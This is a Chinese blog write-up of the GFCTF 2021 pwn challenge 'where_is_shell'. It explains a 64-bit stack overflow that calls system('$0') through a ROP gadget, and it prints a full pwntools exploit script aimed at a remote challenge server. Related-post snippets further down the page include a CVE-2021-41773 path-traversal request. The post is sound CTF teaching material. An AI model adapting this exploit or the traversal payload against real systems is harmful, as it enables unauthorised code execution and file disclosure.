[GFCTF 2021]where_is_shell

最新推荐文章于 2023-05-31 09:57:58 发布
最新推荐文章于 2023-05-31 09:57:58 发布
阅读量490 收藏 5
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129742112
版权

[GFCTF 2021]where_is_shell

这题还是蛮有意思的 虽然是简单的ret2text 但是还是让我学到了新知识

核心知识点:system($0)获取shell权限

checksec后发现是一个开启了NX保护的64位程序 放进ida64里看看

main

请添加图片描述

一个简单的栈溢出漏洞(由于没有puts函数因此无法利用ret2libc来解决)

但是我们在字符串表中发现了system函数的plt表地址 然而却并没有找到bin_sh的地址

看了其他师傅的wp我知道了system($0)也是可以获取shell权限的

然后我们在函数表中找到了tips函数 在其中我们发现了$0所对应的机器码\x24\x30因此 只要我们将这个地址作为参数填充到system函数即可

请添加图片描述

曾看明白这个hint需要关键的一步就是显示操作码

显示操作码步骤:在“ Options(选项) - General(常规)”,选中“ Line prefixes(行前缀)”可以显示跟内存地址有关的更多信息。选中“Number of opcode bytes(操作码字节数)”,可以显示操作码。

exp:

from pwn import *
context.log_level='debug'
elf=ELF('./shell')
io=remote('1.14.71.254',28107)
#io=process('./shell')
system=elf.symbols['system']
rdi=0x4005e3
ret=0x400416
shell=0x400541
payload=b'a'*(0x10+8)+p64(ret)+p64(rdi)+p64(shell)+p64(system)
io.recvuntil('it?\n')
io.sendline(payload)
io.interactive()

sendline(payload)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GFCTF 2021 where_is_shell
2301_79793667的博客
04-09 264
要构造的payload就是首先需要覆盖返回地址,使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0)。发现定义了一个字符串buf,距栈底距离为0x10,并且有一个read函数,再检查附件其他内容并没有发现bin/sh,但是发现了一个tips,跳转到该地址进行查看。只需要取它地址后一位就可以了也就是取到0x400541就能得到$0的机器码。
NSSCTF刷题笔记pwn9——[GFCTF 2021]where_is_shell
qq_45692883的博客
02-02 443
然后首先要注意这是64位的程序,参数会依次存放在rdi,rsi,rdx,rcx,r8,r9这6个寄存器中,多的存放在栈中。$0也是可以被当做shell执行的,因此我们去掉前面一位,取出shell的地址是0x400541。然后我们还需要一个ret的地址,否则本地能打通,远程打不通。存在一个提示函数,代码报红,说明存在问题,看一下机械码。有system函数,但是不存在/bin/sh字符串。可以看到\x24 \x30对应的是$0。main函数,存在很明显的栈溢出。找到地址 0x4005e3。
[红明谷CTF 2021]write_shell
yym68686
10-22 620
[红明谷CTF 2021]write_shell 打开网页,发现源代码: <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!');
2021GFCTF
unexpectedthing的博客
07-07 1555
GFCTF2021
【PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 2919
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
where_is_the_point.rar_The Point
09-20
输出一组图形(矩形或圆)和一组点的数据,判断点的位置。
where_is_waldo
02-15
沃尔多在哪里? COVID-19项目#2 受启发的项目 描述 是否曾经想过快速找到瓦尔多? 该项目使用带有Inception 的预训练和微调在图像中找到waldo 复制 要复制结果,请下载模型,设置pipeline.cfg,并使用train_...
os_support.rar_This Is the Place
09-23
File: os_support.h This is the (tiny) OS abstraction layer. Aside math.h, this is the only place where system headers are allowed.
A_Knife_Where_Is_Heart.zip_PLC_play
09-24
hey play this fraking map
where_is_my_money:找出您的钱并保留!
05-12
在JavaScript编程领域,"where_is_my_money"这个项目可能是一个财务管理和追踪的示例应用,旨在帮助用户了解自己的资金流动情况并有效管理财务。在这个应用中,开发者可能会使用JavaScript的各种特性来实现数据处理...
[GFCTF 2021] day2
qq_62046696的博客
05-07 884
template需要就是传进去index.html,这样才会调用listdata这个方法。--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?发现会调用listdata方法并且需要我们传参 action module。$dir需要是admin,是space传进来的,所以space=admin。/template/admin/ 首先代码中有这一个目录,访问看一下是啥。template也就是filename需要是 index.html。则需要满足 $p存在也就是,在这里需要一个键和值,
[GFCTF 2021]文件查看器(GZ、过滤器、phar) day4
qq_62046696的博客
05-10 602
打开界面直接一个登录界面,直接admin/admin登录进去。进来之后发现是一个文件查看器的功能随便输入了点东西发现了报错,然后读取文件的功能,输入Files.classs.php发现读取不成功换了个index.php大概的意思就是new 传入一个类,然后调用类中的方法,推断肯定有别的源码,果断扫目录发现www.zip,里面有几个php文件,然后可以看到每个类中都有几个魔法函数,说明肯定是用他们一起然后构造一个pop链,大致拼接了一下这里有一个点就是)();
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1618
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
GFCTF2021 部分WP
mumuzi的博客
11-21 4426
只写我做了的 SignIn GFCTF2021 回复GFCTF,得到base64解码即可 GFCTF{W3lc0me_t0_th3_12th_GFCTF} Misc 重生之我在A国当间谍 secret是PDU编码之后的,一句一句的解就行http://www.sendsms.cn/pdu/ 当然这里不是很多,如果是很多的话可以调用控制台来批量解密 倒数第二句:真让人无语。我把密码告诉你,记住,这个密码不要告诉任何人。WzFlNHJsMFwvZQ== 得到密码 [1e4rl0/e 解压出来是一张被撕毁的二维码
[每日一题][GFCTF 2021]Baby_Web
Sapphire037的博客
11-26 1254
前言 坚持。复现平台https://www.ctfer.vip/ 过程 题目标签写了CVE-2021-41773,路径穿越漏洞,进入环境首先看源码 <h1>Welcome To GFCTF 12th!!</h1> <!--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?--> 网上找payload,bp发包 GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/index.php.txt HTTP/1.1 Hos
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8305
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CCD式铆合测定机保养说明书.doc
最新发布
06-30
CCD式铆合测定机保养说明书
ci where_in 字符串怎么处理
05-27
如果要在"ci where_in"函数中处理字符串,可以将字符串转换为数组,然后将数组传递给函数。例如: ``` $string = "apple,orange,banana"; $array_of_values = explode(",", $string); $this->db->where_in('column_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值